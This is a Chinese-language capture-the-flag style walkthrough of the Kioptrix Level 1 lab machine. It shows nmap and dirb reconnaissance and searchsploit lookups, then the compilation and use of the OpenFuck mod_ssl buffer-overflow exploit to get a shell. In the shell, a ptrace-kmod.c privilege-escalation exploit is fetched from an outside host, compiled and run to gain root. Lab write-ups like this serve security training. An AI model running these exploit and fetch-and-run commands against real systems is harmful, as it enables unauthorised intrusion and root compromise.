这个文件是 nmap 扫描结果的 Grepable 格式,它只包含基本的扫描信息,便于使用 grep 等文本处理工具进行搜索。内容如下:
-
扫描目标:192.168.75.147
-
扫描状态:主机在线
-
开放端口:22/tcp (SSH), 80/tcp (HTTP), 111/tcp (RPC), 139/tcp (NetBIOS-SSN), 443/tcp (HTTPS), 1024/tcp (kdm)
文件 namo_ip.nmap
这个文件是 nmap 扫描结果的普通文本格式,包含详细的扫描信息和漏洞检测结果。内容如下:
-
端口和服务信息:
-
22/tcp:开放的SSH服务。
-
80/tcp:开放的HTTP服务,启用了TRACE方法,发现/test.php页面。
-
111/tcp:开放的RPC服务。
-
139/tcp:开放的NetBIOS-SSN服务。
-
443/tcp:开放的HTTPS服务,存在多个漏洞。
-
1024/tcp:开放的kdm服务。
-
漏洞信息:
-
Logjam 漏洞 (CVE-2015-4000):TLS协议中的一个漏洞,允许中间人攻击者降低TLS会话的安全性至512位出口级密码学。
-
POODLE 漏洞 (CVE-2014-3566):SSL协议3.0中的一个漏洞,允许中间人攻击者通过填充预言攻击获取明文数据。
-
CCS 注入漏洞 (CVE-2014-0224):OpenSSL在处理ChangeCipherSpec消息时的漏洞,允许中间人攻击者劫持会话或获取敏感信息。
-
SMBv2 漏洞 (CVE-2009-3103):SMBv2协议实现中的一个数组索引错误,允许远程攻击者执行任意代码或导致拒绝服务。
文件 namo_ip.xml
这个文件是 nmap 扫描结果的 XML 格式,可以被其他程序解析。它包含了与 .nmap 文件相同的信息,但以 XML 格式组织,便于自动化处理和分析。
总结
这些文件提供了对目标主机 192.168.75.147 的详细网络扫描结果,包括开放的端口、服务信息以及存在的安全漏洞。这些信息对于网络安全审计和系统管理非常有用,可以帮助识别和修复潜在的安全风险。
进行目录枚举扫描
dirb http://192.168.75.147/
dirsearch -u 192.168.17.159
┌──(root㉿kali)-[~/work]
└─# dirb http://192.168.75.147
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Dec 5 20:48:31 2024
URL_BASE: http://192.168.75.147/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.75.147/ ----
+ http://192.168.75.147/~operator (CODE:403|SIZE:273)
+ http://192.168.75.147/~root (CODE:403|SIZE:269)
+ http://192.168.75.147/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.75.147/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.75.147/manual/
==> DIRECTORY: http://192.168.75.147/mrtg/
==> DIRECTORY: http://192.168.75.147/usage/
---- Entering directory: http://192.168.75.147/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.75.147/mrtg/ ----
+ http://192.168.75.147/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://192.168.75.147/usage/ ----
+ http://192.168.75.147/usage/index.html (CODE:200|SIZE:4261)
-----------------
END_TIME: Thu Dec 5 20:49:01 2024
DOWNLOADED: 13836 - FOUND: 6
在 192.168.75.147/manual/的网页下,发现Apache/1.3.20 Server at 127.0.0.1 Port 80
搜索漏洞
利用工具 searchsploit Apache 1.3.20 (查找相关漏洞与exp信息)
看了一圈没有发现任何重大问题,直接上漏洞扫描来探测网站是否存在漏洞。
nikto -h http://192.168.17.159
searchsploit Apache 1.3.20
┌──(root㉿kali)-[~/work]
└─# searchsploit Apache 1.3.20
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure | windows/remote/21204.txt
Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Execution | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
80/tcp:开放的HTTP服务,版本为Apache httpd 1.3.20,运行在Unix系统上,特别是Red Hat/Linux系统上,支持mod_ssl/2.8.4和OpenSSL/0.9.6b。
┌──(root㉿kali)-[~/work]
└─# searchsploit mod_ssl 2.8.4
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/work]
└─# searchsploit Apache 1.3.20 mod_ssl 2.8.4
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
使用 -p 选项可以显示漏洞利用脚本的完整路径,并且还会将路径复制到剪贴板,方便用户快速定位和使用该脚 本。
┌──(root㉿kali)-[~/work]
└─# searchsploit -p 47080
Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
URL: https://www.exploit-db.com/exploits/47080
Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
Codes: CVE-2002-0082, OSVDB-857
Verified: False
File Type: C source, ASCII text
下载漏洞
漏洞网址:poc、exp
https://www.exploit-db.com/
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
打开网址:https://www.exploit-db.com/exploits/47080
复制链接地址,使用wget进行下载
wget https://www.exploit-db.com/download/47080
建议使用在电脑下载好,复制到kail的虚拟机中
编译代码
将下载的47080文件修改为47080.c文件
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# mv 47080 47080.c
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ls
47080.c namo_ip.gnmap namo_ip.nmap namo_ip.xml
(因为是c exp要编译 gcc编译 文件 -o命名为 470文件 要编译的文件 47080.c )
出现报错
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# gcc -o 470 47080.c
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
compilation terminated.
解决方法
换源
进入更新源页面
vim /etc/apt/sources.list
#注释掉kali自带源
安装,我选择阿里云
官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
浙大
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
shift键 +:wq 保存退出
更新软件包列表:更改源后,您需要更新软件包列表。在终端中运行以下命令:
apt-get update
升级系统:如果您想要升级系统,可以运行以下命令:
apt-get upgrade
0penSSL开发库安装
apt-get update
apt-get install libssl-dev
编译c文件:
因为是c exp要编译 gcc编译 文件 -o命名为 470文件 要编译的文件 47080.c
-lcrypto 需要换源
gcc -o 470 47080.c -lcrypto
searchsploit -m 47080.c
gcc -o exploit21671 47080.c -lssl -lcrypto
gcc -o exploit21671 47080.c -lssl -lcrypto -Wno-deprecated-declarations (报错就用这个屏蔽警告)
编译文件后,有生成的程序就行
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# chmod 777 470
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# chmod +x 470
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ls -ls
总计 76
44 -rwxrwxrwx 1 root root 42448 12月 6日 08:59 470
32 -rw-r--r-- 1 root root 32290 12月 6日 08:58 47080.c
执行了./470 | grep "1.3.20"命令,先是运行当前目录下的470文件(其功能未知),再通过grep工具筛选出包含 “1.3.20” 的输出行,展示的结果是不同操作系统环境下使用apache-1.3.20版本的相关配置情况,各系统以编号加对应描述形式呈现
./470 | grep "1.3.20"
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ./470 | grep "1.3.20"
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
执行exp链接 shell
./470 0x6b 192.168.75.147 -c 40
下载提权脚本
打开新的终端,下载到主机上
开启端口,利用低权限用户Apache向靶机上传文件
(手动下载到电脑上,上传到kail虚拟机,不要先使用wget)
wget https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ls
470 47080.c ptrace-kmod.c
开启80端口监听
python -m http.server 80
查看监听地址
ip a
停止占用端口
-
找出并停止占用端口的服务: 如果您确实需要使用端口 80,您可以找出哪个服务正在使用该端口,并停止它。
使用以下命令找出占用端口 80 的服务:sudo netstat -tulpn | grep 80或者使用 ss 命令:
sudo ss -tulpn | grep 80这些命令将列出所有使用端口 80 的进程。您可以根据列出的 PID(进程 ID)使用 kill 命令来停止这些进程:
sudo kill -9 <PID>请谨慎使用 kill -9,因为它会强制终止进程,可能导致数据丢失或其他问题。
开启80端口监听
python -m http.server 80
查看监听地址
ip a
有ptrace-kmod.c文件的终端:
在低权限账户 上传下载 提权脚本
启动python http 服务后,在ptrace-kmod.c文件的终端使用wget命令
wget http://192.168.75.145:80/ptrace-kmod.c
在新的的终端上可以看到:
exit退出终端
再次链接
./470 0x6b 192.168.75.147 -c 40
./470 0x6b 192.168.75.147 443 -c 40
whoami
进入root
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ./470 0x6b 192.168.75.147 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--10:13:28-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c.1'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: file path prefix `/usr/bin' never used
[+] Attached to 1826
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
ls
exploit
tool
cd /root
ls
anaconda-ks.cfg
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ./470 0x6b 192.168.75.147 443 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--10:16:49-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
ls
exploit
tool
whoami
root
exit
bash-2.05$ exit
exit
exit
Good Bye!
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─#
原文始发于微信公众号(泷羽sec-星辰系主):01-Kioptix Level-1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论